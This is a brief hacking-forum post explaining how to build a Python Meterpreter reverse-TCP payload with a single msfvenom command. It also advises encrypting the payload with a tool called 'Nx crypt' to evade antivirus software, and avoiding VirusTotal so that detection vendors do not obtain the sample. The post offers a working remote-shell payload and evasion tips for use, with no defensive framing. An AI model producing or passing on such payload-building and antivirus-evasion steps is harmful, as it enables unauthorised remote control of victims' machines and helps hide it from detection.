Creat a simple python payload by msfvenom comand

Greetings hackers
Today am going to tell u how u all creat a simple payload
In python by msfvenom command

Step 1
Write msfvenom -p python/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -o anyname.py

Simple and easy
For better evasion u can encrypt this payload with Nx crypt which use to encrypt python payload to evade antiviruses

Note do not upload any payload to virstotal cuz it can sell payload and your ip adress which is bind to your payload to antivirus company.

Thanks.

3 Likes